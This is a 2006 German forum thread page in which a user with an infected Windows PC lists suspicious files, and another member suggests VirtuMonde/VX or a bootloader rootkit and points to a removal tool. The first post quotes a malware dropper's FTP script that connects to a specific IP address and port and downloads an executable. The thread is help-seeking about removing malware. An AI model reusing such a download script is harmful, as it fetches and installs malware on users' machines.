Delphi-PRAXiS
Seite 5 von 5   « Erste     345   
40 Beiträge dieses Themas auf einer Seite anzeigen

Delphi-PRAXiS (https://www.delphipraxis.net/forum.php)
-   Betriebssysteme (https://www.delphipraxis.net/27-betriebssysteme/)
-   -   seppgm.sys? was ist das für eine Datei? (https://www.delphipraxis.net/71514-seppgm-sys-ist-das-fuer-eine-datei.html)

ritchietwo 24. Aug 2006 23:26
Re: seppgm.sys? was ist das für eine Datei?
 
Nachtrag, hier die Dateien, die sonst noch drauf waren:
zzz.exe - keine Ahnung, was die anstellt?
pis.exe - keine Ahnung, was die anstellt?

i.??? - keine Ahnung, was die anstellt?
(Erweiterung heisst "Datei", ist eine Textdatei mit Inhalt:
open 145.254.227.182 65531
user 1 1
get setup_34417.exe
quit
das scheint wohl die Wurzel aller Übel,
aber was passiert dabei?)

setup_34417.exe - die schaltet wohl dann den ganzen Mist frei?

Neu sind nun die Dateien:
SS1001newer.exe
stub_113_4_0_4_0newer.exe
kybrdff_11a.exe
dfndrff_11a.exe

Kennt jemand den Müll?

Olli 25. Aug 2006 02:04
Re: seppgm.sys? was ist das für eine Datei?
 
Zitat:
Zitat von ritchietwo
Hello again, hat leider etwas länger gedauert, lag einige Tage mit einem echten biologischen Virus flach.
Wer will denn nun ernsthaft die Dateien von dem Zeugs haben? Und wohin soll ich es senden? Ich habe da mehrere Email-Accounts, die ich seit langem nicht mehr nutzte (weil total zugemüllt) und könnte einen davon für kurze Zeit wieder öffnen....
Habe fleissig in der Registry und auch sonst überall gelöscht - "ES" war weg und dann plötzlich mit völlig neuen Namen wieder da.
Wird wohl langsam interessant, was sich da auf meinem WochenendPC so alles abspielt. Haben die Stümper so schnell dazugelernt, oder mutiert das Ding wirklich? Bin mit dem Löschen neuer Dateien kaum nachgekommen, habe aber alles schön sauber dokumentiert.
Habe den PC komplett neu aufgesetzt, kriege aber wieder sonderbare Fehlermeldungen wie "System has found 55 critical errors, visit registryclean.com to ...." und so'n Mist(schreibt W2K wirklich den Bootsektor neu? kann ich kaum glauben).
Also, wie machen wir weiter, wer kann helfen? Als nächsten Schritt schmeiss ich wohl meine Festplatte weg???
Ich ich ich! Meine Mailadresse findest du hier. Die .sys ist dabei?

Das klingt nach VirtuMonde/VX. Suche mal nach diesen Stichworten. Es gibt mindestens ein Freewareprogramm zum Entfernen. Die Wahrscheinlichkeit ist groß, daß sich das Ding insbesondere in den Winlogon-Keys (als Notification-Package) eingetragen hat. Da bekommt man es nicht soo leicht wieder raus. Ich habe damals eine Methode für Lavasoft entwickelt, welche das auch auf einem laufenden System entdecken und stillegen konnte. Allerdings ist dabei das Problem, daß ich es nicht weiterentwickeln konnte, daher ist es noch auf dem ursprünglichen Stand, der zwar für bestimmte Versionen von VirtuMonde geeignet ist, für andere aber nicht. Das Programm welches ich damals schrieb findest du bei den Lavasoft Betatestseiten, es wurde nur der Hinweis entfernt, daß ich es geschrieben habe (was sonst bei LS üblich war, zB beim ARIES Rootkit Remover und noch früheren Tools/Produkten) und eine Message-Box hinzugefügt, ansonsten sollte es den gleichen Funktionsumfang haben. Versuch's halt mal.

Als letzte wahrscheinliche Variante fallen mir noch Rootkits ein, die NTLDR oder so infizieren. Es gab dazu nachweislich Prototypen (es wurden auch Boot-CDs zu Demozwecken auf einer Veranstaltung verteilt, die ein solches Prototypen-Rootkit enthielten) die das können. Die hängen sich salopp gesagt noch vor dem Umschalten in den 32bit Protected Mode ins System, und sind so danach resident ohne als Treiber geladen werden zu müssen.


Alle Zeitangaben in WEZ +1. Es ist jetzt 14:12 Uhr.
Seite 5 von 5   « Erste     345   
40 Beiträge dieses Themas auf einer Seite anzeigen

Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO © 2011, Crawlability, Inc.
Delphi-PRAXiS (c) 2002 - 2023 by Daniel R. Wolf, 2024-2025 by Thomas Breitkreuz